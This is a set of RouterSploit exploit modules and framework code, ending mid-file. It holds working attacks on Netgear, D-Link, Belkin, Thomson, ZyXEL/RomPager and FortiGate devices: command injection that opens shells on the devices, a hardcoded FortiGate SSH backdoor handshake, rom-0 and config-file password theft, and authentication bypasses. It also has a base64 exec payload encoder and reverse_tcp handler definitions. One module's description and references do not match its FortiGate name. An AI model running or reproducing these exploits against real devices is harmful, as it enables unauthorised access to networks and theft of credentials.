from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netgear DGN2200 RCE",
        "description": "Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script.",
        "authors": (
            "SivertPL",  # vulnerability discovery
            "Josh Abraham <sinisterpatrician[at]google.com>",  # routesploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/41394/",
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077",
        ),
        "devices": (
            "Netgear DGN2200v1",
            "Netgear DGN2200v2",
            "Netgear DGN2200v3",
            "Netgear DGN2200v4",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString("admin", "Username")
    password = OptString("password", "Password")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self, architecture="mipsbe")
        else:
            print_error("Target is not vulnerable")

    def execute(self, command):
        data = {
            "IPAddr1": 12,
            "IPAddr2": 12,
            "IPAddr3": 12,
            "IPAddr4": 12,
            "ping": "Ping",
            "ping_IPAddr": "12.12.12.12; " + command
        }
        referer = "{}/DIAG_diag.htm".format(self.target)
        headers = {'referer': referer}

        r = self.http_request(
            method="POST",
            path="/ping.cgi",
            data=data,
            auth=(self.username, self.password),
            headers=headers
        )
        if r is None:
            return ""

        result = self.parse_output(r.text)
        return result

    def parse_output(self, text):
        yet = False
        result = []
        for line in text.splitlines():
            if line.startswith("<textarea"):
                yet = True
                continue
            if yet:
                if line.startswith("</textarea>"):
                    break
                result.append(line)
        return "\n".join(result)

    @mute
    def check(self):
        """
        Method that verifies if the target is vulnerable.
        """
        rand_marker = utils.random_text(6)
        command = "echo {}".format(rand_marker)

        if rand_marker in self.execute(command):
            return True

        return False



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.libs.lzs.lzs import LZSDecompress


class Exploit(HTTPClient):
    __info__ = {
        "name": "RomPager ROM-0",
        "description": "Exploits RomPager ROM-0 authentication bypass vulnerability that allows downloading "
                       "rom file and extract password without credentials.",
        "authors": (
            "0BuRner",  # routersploit module
        ),
        "references": (
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-4019",
            "http://www.osvdb.org/show/osvdb/102668",
            "https://dariusfreamon.wordpress.com/tag/rompager/",
            "http://rootatnasro.wordpress.com/2014/01/11/how-i-saved-your-a-from-the-zynos-rom-0-attack-full-disclosure/",
            "https://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf",
        ),
        "devices": (
            "AirLive WT-2000ARM (2.11.6.0(RE0.C29)3.7.6.1)",
            "D-Link DSL-2520U (1.08 Hardware Version: B1)",
            "D-Link DSL-2640R",
            "D-Link DSL-2740R (EU_1.13 Hardware Version: A1)",
            "Huawei 520 HG",
            "Huawei 530 TRA",
            "Pentagram Cerberus P 6331-42",
            "TP-Link TD-8816",
            "TP-Link TD-8817 (3.0.1 Build 110402 Rel.02846)",
            "TP-LINK TD-8840T (3.0.0 Build 101208 Rel.36427)",
            "TP-Link TD-W8901G",
            "TP-Link TD-W8951ND",
            "TP-Link TD-W8961ND",
            "ZTE ZXV10 W300 (W300V1.0.0a_ZRD_CO3)",
            "ZTE ZXDSL 831CII (ZXDSL 831CIIV2.2.1a_Z43_MD)",
            "ZynOS",
            "ZyXEL ES-2024",
            "ZyXEL Prestige P-2602HW",
            "ZyXEL Prestige 782R",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            print_status("Downloading rom-0 file...")
            response = self.http_request(
                method="GET",
                path="/rom-0",
            )

            if response:
                print_status("Extracting password from file...")
                password = self.extract_password(response.content)
                print_success("Router password is: {}".format(password))
        else:
            print_error("Target is not vulnerable")

    @staticmethod
    def extract_password(data):
        fpos = 8568

        # Decompress chunk
        result, window = LZSDecompress(data[fpos:])
        print_status("Decompressed chunk: {0}".format(result))

        # Extract plaintext password
        res = re.findall("([\040-\176]{5,})", result)
        if res:
            return res[0]

        return "<not found>"

    @mute
    def check(self):
        response = self.http_request(
            method="HEAD",
            path="/rom-0"
        )

        if response is not None:
            response = self.http_request(
                method="GET",
                path="/rom-0",
            )

            if response is not None \
                    and response.status_code == 200 \
                    and "<html" not in response.text \
                    and len(response.text) > 500:
                return True

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DIR-645 & DIR-815 RCE",
        "description": "Module exploits D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability which allows executing command on the device.",
        "authors": (
            "Michael Messner <devnull[at]s3cur1ty.de>",  # Vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.s3cur1ty.de/m1adv2013-017",
        ),
        "devices": (
            "DIR-815 v1.03b02",
            "DIR-645 v1.02",
            "DIR-645 v1.03",
            "DIR-600 below v2.16b01",
            "DIR-300 revB v2.13b01",
            "DIR-300 revB v2.14b01",
            "DIR-412 Ver 1.14WWB02",
            "DIR-456U Ver 1.00ONG",
            "DIR-110 Ver 1.01",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection, response is not available")
            shell(self, architecture="mipsle", method="echo", location="/var/tmp/")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        cmd = "%26 {}%26".format(cmd.replace("&", "%26"))

        headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
        data = "act=ping&dst={}".format(cmd)

        self.http_request(
            method="POST",
            path="/diagnostic.php",
            headers=headers,
            data=data
        )
        return ""

    @mute
    def check(self):
        headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
        data = {"act": "ping",
                "dst": "& ls&"}

        response = self.http_request(
            method="POST",
            path="/diagnostic.php",
            headers=headers,
            data=data
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and "<report>OK</report>" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netgear N300 Auth Bypass",
        "description": "Module exploits authentication bypass vulnerability in Netgear N300 devices. "
                       "It is possible to access administration panel without providing password.",
        "authors": (
            "Daniel Haake <daniel.haake[at]csnc.de>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt",
            "http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html",
        ),
        "devices": (
            "Netgear N300",
            "Netgear JNR1010v2",
            "Netgear JNR3000",
            "Netgear JWNR2000v5",
            "Netgear JWNR2010v5",
            "Netgear R3250",
            "Netgear WNR2020",
            "Netgear WNR614",
            "Netgear WNR618",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            url = "{}:{}".format(self.target, self.port)
            print_info("Visit: {}/\n".format(url))
        else:
            print_error("Target seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/",
        )
        if response is None:
            return False  # target is not vulnerable

        # unauthorized
        if response.status_code == 401:
            for _ in range(0, 3):
                response = self.http_request(
                    method="GET",
                    path="/BRS_netgear_success.html",
                )
                if response is None:
                    return False  # target is not vulnerable

            response = self.http_request(
                method="GET",
                path="/"
            )
            if response is None:
                return False  # target is not vulnerable

            # authorized
            if response.status_code == 200:
                return True  # target is vulnerable

        return False  # target not vulnerable



import paramiko
import base64
import hashlib

from routersploit.core.exploit import *
from routersploit.core.ssh.ssh_client import SSHClient


class Exploit(SSHClient):
    __info__ = {
        "name": "FortiGate OS 4.x-5.0.7 Backdoor",
        "description": "Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability "
                       "which allows executing command on the device.",
        "authors": (
            "operator8203",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router",
            "http://www.s3cur1ty.de/home-network-horror-days",
            "http://www.s3cur1ty.de/m1adv2013-003",
        ),
        "devices": (
            "FortiGate OS Version 4.x-5.0.7",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(22, "Target SSH port")

    def run(self):
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
            client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass
        except Exception:
            print_error("Exploit Failed - SSH Service is down")
            return

        trans = client.get_transport()
        try:
            trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
        except paramiko.ssh_exception.AuthenticationException:
            pass
        except Exception:
            print_status("Error with Existing Session. Wait few minutes.")
            return

        try:
            trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)

            print_success("Exploit succeeded")
            ssh_interactive(client)
        except Exception:
            print_error("Exploit failed")
            return

    @mute
    def check(self):
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
            client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass
        except Exception:
            return False  # target is not vulnerable

        trans = client.get_transport()
        try:
            trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
        except paramiko.ssh_exception.AuthenticationException:
            pass
        except Exception:
            return None  # could not verify

        try:
            trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)
        except Exception:
            return False  # target is not vulnerable

        return True  # target is vulnerable

    def custom_handler(self, title, instructions, prompt_list):
        n = prompt_list[0][0]
        m = hashlib.sha1()
        m.update('\x00' * 12)
        m.update(n + 'FGTAbc11*xy+Qqz27')
        m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
        h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
        return [h]



import re
import os.path

from routersploit.core.exploit.exceptions import OptionValidationError
from routersploit.core.exploit.utils import (
    is_ipv4,
    is_ipv6,
)


# pylint: disable=no-member
class Option:
    """ Exploit attribute that is set by the end user """

    def __init__(self, default, description="", advanced=False):
        self.label = None
        self.description = description

        try:
            self.advanced = bool(advanced)
        except ValueError:
            raise OptionValidationError("Invalid value. Cannot cast '{}' to boolean.".format(advanced))

        if default or default == 0:
            self.__set__("", default)
        else:
            self.display_value = ""
            self.value = ""

    def __get__(self, instance, owner):
        return self.value


class OptIP(Option):
    """ Option IP attribute """

    def __set__(self, instance, value):
        if not value or is_ipv4(value) or is_ipv6(value):
            self.value = self.display_value = value
        else:
            raise OptionValidationError("Invalid address. Provided address is not valid IPv4 or IPv6 address.")


class OptPort(Option):
    """ Option Port attribute """

    def __set__(self, instance, value):
        try:
            value = int(value)

            if 0 < value <= 65535:  # max port number is 65535
                self.display_value = str(value)
                self.value = value
            else:
                raise OptionValidationError("Invalid option. Port value should be between 0 and 65536.")
        except ValueError:
            raise OptionValidationError("Invalid option. Cannot cast '{}' to integer.".format(value))


class OptBool(Option):
    """ Option Bool attribute """

    def __init__(self, default, description="", advanced=False):
        self.description = description

        if default:
            self.display_value = "true"
        else:
            self.display_value = "false"

        self.value = default

        try:
            self.advanced = bool(advanced)
        except ValueError:
            raise OptionValidationError("Invalid value. Cannot cast '{}' to boolean.".format(advanced))

    def __set__(self, instance, value):
        if value == "true":
            self.value = True
            self.display_value = value
        elif value == "false":
            self.value = False
            self.display_value = value
        else:
            raise OptionValidationError("Invalid value. It should be true or false.")


class OptInteger(Option):
    """ Option Integer attribute """

    def __set__(self, instance, value):
        try:
            self.display_value = str(value)
            self.value = int(value)
        except ValueError:
            try:
                self.value = int(value, 16)
            except ValueError:
                raise OptionValidationError("Invalid option. Cannot cast '{}' to integer.".format(value))


class OptFloat(Option):
    """ Option Float attribute """

    def __set__(self, instance, value):
        try:
            self.display_value = str(value)
            self.value = float(value)
        except ValueError:
            raise OptionValidationError("Invalid option. Cannot cast '{}' to float.".format(value))


class OptString(Option):
    """ Option String attribute """

    def __set__(self, instance, value):
        try:
            self.value = self.display_value = str(value)
        except ValueError:
            raise OptionValidationError("Invalid option. Cannot cast '{}' to string.".format(value))


class OptMAC(Option):
    """ Option MAC attribute """

    def __set__(self, instance, value):
        regexp = r"^[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}$"
        if re.match(regexp, value.lower()):
            self.value = self.display_value = value
        else:
            raise OptionValidationError("Invalid option. '{}' is not a valid MAC address".format(value))


class OptWordlist(Option):
    """ Option Wordlist attribute """

    def __get__(self, instance, owner):
        if self.display_value.startswith("file://"):
            path = self.display_value.replace("file://", "")
            with open(path, "r") as f:
                lines = [line.strip() for line in f.readlines()]
                return lines

        return self.display_value.split(",")

    def __set__(self, instance, value):
        if value.startswith("file://"):
            path = value.replace("file://", "")
            if not os.path.exists(path):
                raise OptionValidationError("File '{}' does not exist.".format(path))

        self.value = self.display_value = value


class OptEncoder(Option):
    """ Option Encoder attribute """

    def __init__(self, default, description="", advanced=False):
        self.description = description

        if default:
            self.display_value = default
            self.value = default
        else:
            self.display_value = ""
            self.value = None

        try:
            self.advanced = bool(advanced)
        except ValueError:
            raise OptionValidationError("Invalid value. Cannot cast '{}' to boolean.".format(advanced))

    def __set__(self, instance, value):
        encoder = instance.get_encoder(value)

        if encoder:
            self.value = encoder
            self.display_value = value
        else:
            raise OptionValidationError("Encoder not available. Check available encoders with `show encoders`.")



import socket
import requests
import urllib3

from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
from routersploit.core.exploit.option import OptBool
from routersploit.core.exploit.printer import print_error


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

HTTP_TIMEOUT = 30.0


# pylint: disable=no-member
class HTTPClient(Exploit):
    """ HTTP Client provides methods to handle communication with HTTP server """

    target_protocol = Protocol.HTTP

    verbosity = OptBool(True, "Verbosity enabled: true/false")
    ssl = OptBool(False, "SSL enabled: true/false")

    def http_request(self, method: str, path: str, session: requests = requests, **kwargs) -> requests.Response:
        """ Requests HTTP resource

        :param str method: method that should be issued e.g. GET, POST
        :param str path: path to the resource that should be requested
        :param requests session: session manager that should be used
        :param kwargs: kwargs passed to request method
        :return Response: Response object
        """

        if self.ssl:
            url = "https://"
        else:
            url = "http://"

        url += "{}:{}{}".format(self.target, self.port, path)

        kwargs.setdefault("timeout", HTTP_TIMEOUT)
        kwargs.setdefault("verify", False)
        kwargs.setdefault("allow_redirects", False)

        try:
            return getattr(session, method.lower())(url, **kwargs)
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: {}".format(url), verbose=self.verbosity)
        except requests.exceptions.ConnectionError:
            print_error("Connection error: {}".format(url), verbose=self.verbosity)
        except requests.RequestException as error:
            print_error(error, verbose=self.verbosity)
        except socket.error as err:
            print_error(err, verbose=self.verbosity)
        except KeyboardInterrupt:
            print_error("Module has been stopped", verbose=self.verbosity)

        return None

    def get_target_url(self, path: str = "") -> str:
        """ Get target URL

        :param str path: path to http server resource
        :return str: full target url with correct schema
        """

        if self.ssl:
            url = "https://"
        else:
            url = "http://"

        url += "{}:{}{}".format(self.target, self.port, path)

        return url

    def http_test_connect(self) -> bool:
        """ Test connection to HTTP server

        :return bool: True if test connection was successful, False otherwise
        """

        response = self.http_request(
            method="GET",
            path="/"
        )

        if response:
            return True

        return False



from base64 import b64encode
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures


class Encoder(BaseEncoder):
    __info__ = {
        "name": "Python Base64 Encoder",
        "description": "Module encodes Python payload to Base64 format.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON

    def encode(self, payload):
        encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
        return "exec('{}'.decode('base64'))".format(encoded_payload)



import json
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DWR-932 Info Disclosure",
        "description": "Module explois information disclosure vulnerability in D-Link DWR-932 devices. "
                       "It is possible to retrieve sensitive information such as credentials.",
        "authors": (
            "Saeed reza Zamanian",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/39581/",
        ),
        "devices": (
            "D-Link DWR-932",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        path = "/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703"

        response = self.http_request(
            method="GET",
            path=path
        )
        if response is None:
            return

        try:
            print_status("Decoding JSON")
            data = json.loads(response.text)
        except ValueError:
            print_error("Exploit failed - response is not valid JSON")
            return

        if len(data):
            print_success("Exploit success")

        rows = []
        for key in data.keys():
            if len(data[key]) > 0:
                rows.append((key, data[key]))

        headers = ("Parameter", "Value")
        print_table(headers, *rows)

    @mute
    def check(self):
        path = "/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703"

        response = self.http_request(
            method="GET",
            path=path
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200:
            try:
                data = json.loads(response.text)
                if len(data):
                    return True  # target is vulnerable
            except ValueError:
                return False  # target is not vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Belkin Auth Bypass",
        "description": "Module exploits Belkin authentication using MD5 password disclosure.",
        "authors": (
            "Gregory Smiley <gsx0r.sec[at]gmail.com>",  # vulnerability discovery
            "BigNerd95 (Lorenzo Santina)",  # improved exploit and routersploit module
        ),
        "references": (
            "https://securityevaluators.com/knowledge/case_studies/routers/belkin_n900.php",
            "https://www.exploit-db.com/exploits/40081/",
        ),
        "devices": (
            "Belkin Play Max (F7D4401)",
            "Belkin F5D8633",
            "Belkin N900 (F9K1104)",
            "Belkin N300 (F7D7301)",
            "Belkin AC1200",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        response = self.http_request(
            method="GET",
            path="/login.stm",
        )
        if response is None:
            return

        val = re.findall(r'password\s?=\s?"(.+?)"', response.text)  # in some fw there are no spaces

        if len(val):
            payload = "pws=" + val[0] + "&arc_action=login&action=Submit"

            login = self.http_request(
                method="POST",
                path="/login.cgi",
                data=payload
            )
            if login is None:
                return

            error = re.search('loginpserr.stm', login.text)

            if not error:
                print_success("Exploit success, you are now logged in!")
                return

        print_error("Exploit failed. Device seems to be not vulnerable.")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/login.stm",
        )
        if response is None:
            return False  # target is not vulnerable

        val = re.findall(r'password\s?=\s?"(.+?)"', response.text)  # in some fw there are no spaces

        if len(val):
            return True  # target vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Thomson TWG850 Password Disclosure",
        "description": "Module exploits Thomson TWG850 password disclosure vulnerability which allows fetching administration's password.",
        "authors": (
            "Sebastian Perez",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://packetstormsecurity.com/files/136135/Thomson-Router-TWG850-4U-XSS-CSRF-Unauthenticated-Access.html",
        ),
        "devices": (
            "Thomson TWG850",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        response = self.http_request(
            method="GET",
            path="/GatewaySettings.bin",
        )

        if response is None:
            return

        if response.status_code == 200 and "0MLog" in response.text:
            print_success("Exploit success")
            print_status("Reading file GatewaySettings.bin")
            print_info(response.text)
        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/GatewaySettings.bin",
        )

        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and "0MLog" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Belkin G Info Disclosure",
        "description": "Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure "
                       "vulnerability which allows fetching sensitive information such as credentials.",
        "authors": (
            "DarkFig",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0403",
            "https://www.exploit-db.com/exploits/4941/",
        ),
        "devices": (
            "Belkin G",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        response = self.http_request(
            method="GET",
            path="/SaveCfgFile.cgi",
        )
        if response is None:
            return

        var = [
            'pppoe_username',
            'pppoe_password',
            'wl0_pskkey',
            'wl0_key1',
            'mradius_password',
            'mradius_secret',
            'httpd_password',
            'http_passwd',
            'pppoe_passwd'
        ]

        data = []
        for v in var:
            regexp = '{}="(.+?)"'.format(v)

            val = re.findall(regexp, response.text)
            if len(val):
                data.append((v, val[0]))

        if len(data):
            print_success("Exploit success")
            headers = ("Option", "Value")
            print_table(headers, *data)

        else:
            print_error("Exploit failed")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/SaveCfgFile.cgi",
        )
        if response is None:
            return False  # target is not vulnerable

        var = [
            'pppoe_username',
            'pppoe_password',
            'wl0_pskkey',
            'wl0_key1',
            'mradius_password',
            'mradius_secret',
            'httpd_password',
            'http_passwd',
            'pppoe_passwd'
        ]

        if any(map(lambda x: x in response.text, var)):
            return True   # target vulnerable

        return False  # target is not vulnerable



import socket

from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
from routersploit.core.exploit.option import OptBool
from routersploit.core.exploit.printer import print_status
from routersploit.core.exploit.printer import print_error
from routersploit.core.exploit.utils import is_ipv4
from routersploit.core.exploit.utils import is_ipv6


TCP_SOCKET_TIMEOUT = 8.0


class TCPCli:
    """ TCP Client provides methods to handle communication with TCP server """

    def __init__(self, tcp_target: str, tcp_port: int, verbosity: bool = False) -> None:
        """ TCP client constructor

        :param str tcp_target: target TCP server ip address
        :param int tcp_port: target TCP server port
        :param bool verbosity: display verbose output
        :return None:
        """

        self.tcp_target = tcp_target
        self.tcp_port = tcp_port
        self.verbosity = verbosity

        self.peer = "{}:{}".format(self.tcp_target, self.tcp_port)

        if is_ipv4(self.tcp_target):
            self.tcp_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        elif is_ipv6(self.tcp_target):
            self.tcp_client = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
        else:
            print_error("Target address is not valid IPv4 nor IPv6 address", verbose=self.verbosity)
            return None

        self.tcp_client.settimeout(TCP_SOCKET_TIMEOUT)

    def connect(self) -> bool:
        """ Connect to TCP server

        :return bool: True if connection was successful, False otherwise
        """
        try:
            self.tcp_client.connect((self.tcp_target, self.tcp_port))
            print_status(self.peer, "TCP Connection established", verbose=self.verbosity)
            return True

        except Exception as err:
            print_error(self.peer, "TCP Error while connecting to the server", err, verbose=self.verbosity)

        return False

    def send(self, data: bytes) -> bool:
        """ Send data to TCP server

        :param bytes data: data that should be sent to TCP server
        :return bool: True if sending data was successful, False otherwise
        """
        try:
            self.tcp_client.send(data)
            return True
        except Exception as err:
            print_error(self.peer, "TCP Error while sending data", err, verbose=self.verbosity)

        return False

    def recv(self, num: int) -> bytes:
        """ Receive data from TCP server

        :param int num: number of bytes that should be received from the server
        :return bytes: data that was received from the server
        """

        try:
            response = self.tcp_client.recv(num)
            return response
        except Exception as err:
            print_error(self.peer, "TCP Error while receiving data", err, verbose=self.verbosity)

        return None

    def recv_all(self, num: int) -> bytes:
        """ Receive all data sent by the server

        :param int num: number of total bytes that should be received
        :return bytes: data that was received from the server
        """

        try:
            response = b""
            received = 0
            while received < num:
                tmp = self.tcp_client.recv(num - received)

                if tmp:
                    received += len(tmp)
                    response += tmp
                else:
                    break

            return response
        except Exception as err:
            print_error(self.peer, "TCP Error while receiving all data", err, verbose=self.verbosity)

        return None

    def close(self) -> bool:
        """ Close connection to TCP server

        :return bool: True if closing connection was successful, False otherwise
        """

        try:
            self.tcp_client.close()
            return True
        except Exception as err:
            print_error(self.peer, "TCP Error while closing tcp socket", err, verbose=self.verbosity)

        return False


# pylint: disable=no-member
class TCPClient(Exploit):
    """ TCP Client exploit """

    target_protocol = Protocol.TCP

    verbosity = OptBool(True, "Enable verbose output: true/false")

    def tcp_create(self, target: str = None, port: int = None) -> TCPCli:
        """ Creates TCP client

        :param str target: target TCP server ip address
        :param int port: target TCP server port
        :return TCPCli: TCP client object
        """

        tcp_target = target if target else self.target
        tcp_port = port if port else self.port

        tcp_client = TCPCli(tcp_target, tcp_port, verbosity=self.verbosity)
        return tcp_client



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netgear Multi RCE",
        "description": "Module exploits remote command execution in multiple Netgear devices. If the target is "
                       "vulnerable, command loop is invoked that allows executing commands on operating system level.",
        "authors": (
            "Andrei Costin <andrei[at]firmware.re>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://firmware.re/vulns/acsa-2015-001.php",
            "https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf",
        ),
        "devices": (
            "Netgear WG102",
            "Netgear WG103",
            "Netgear WN604",
            "Netgear WNDAP350",
            "Netgear WNDAP360",
            "Netgear WNAP320",
            "Netgear WNAP210",
            "Netgear WNDAP660",
            "Netgear WNDAP620",
            "Netgear WNDAP380R",
            "Netgear WNDAP380R(v2)",
            "Netgear WN370",
            "Netgear WND930",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    arch = OptString('mipsbe', 'Target architecture: mipsbe, mipsle')

    def __init__(self):
        self.resources = ['boardData102.php', 'boardData103.php', 'boardDataNA.php', 'boardDataWW.php', 'boardDataJP.php']
        self.valid_resource = None

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>")

            if self.arch == "mipsbe":
                shell(self, architecture="mipsbe", method="wget", location="/tmp")
            elif self.arch == "mipsle":
                shell(self, architecture="mipsle", method="wget", location="/tmp")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        path = ("/{}?writeData=true&reginfo=0&macAddress= "
                "001122334455 -c 0 ;{}; echo #".format(self.valid_resource, cmd))

        # blind command injection
        self.http_request(
            method="GET",
            path=path
        )
        return ""

    @mute
    def check(self):
        mark = utils.random_text(32)
        cmd = "echo {}".format(mark)

        for resource in self.resources:
            path = ("/{}?writeData=true&reginfo=0&macAddress= "
                    "001122334455 -c 0 ;{}; echo #".format(resource, cmd))

            response = self.http_request(
                method="GET",
                path=path,
            )
            if response is None:
                return False  # target is not vulnerable

            if response.status_code == 200:
                response_body = response.text
                if "Update Success!" in response_body and mark in response_body:
                    self.valid_resource = resource
                    return True  # target is vulnerable

        return False  # target is not vulnerable



import importlib
from collections import namedtuple
from struct import pack

from routersploit.core.exploit.exploit import (
    BaseExploit,
    ExploitOptionsAggregator,
)
from routersploit.core.exploit.option import (
    OptIP,
    OptPort,
    OptString,
)
from routersploit.core.exploit.exceptions import OptionValidationError
from routersploit.core.exploit.printer import (
    print_status,
    print_error,
    print_success,
    print_info,
)

from routersploit.core.exploit.utils import (
    index_modules,
    random_text,
)


architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE", "X86", "X64", "PERL", "PHP", "PYTHON"])
Architectures = architectures(
    ARMLE="armle",
    MIPSBE="mipsbe",
    MIPSLE="mipsle",
    X86="x86",
    X64="x64",
    PERL="perl",
    PHP="php",
    PYTHON="python",
)

payload_handlers = namedtuple("PayloadHandlers", ["BIND_TCP", "REVERSE_TCP"])
PayloadHandlers = payload_handlers(
    BIND_TCP="bind_tcp",
    REVERSE_TCP="reverse_tcp",
)

ARCH_ELF_HEADERS = {
    Architectures.ARMLE: (
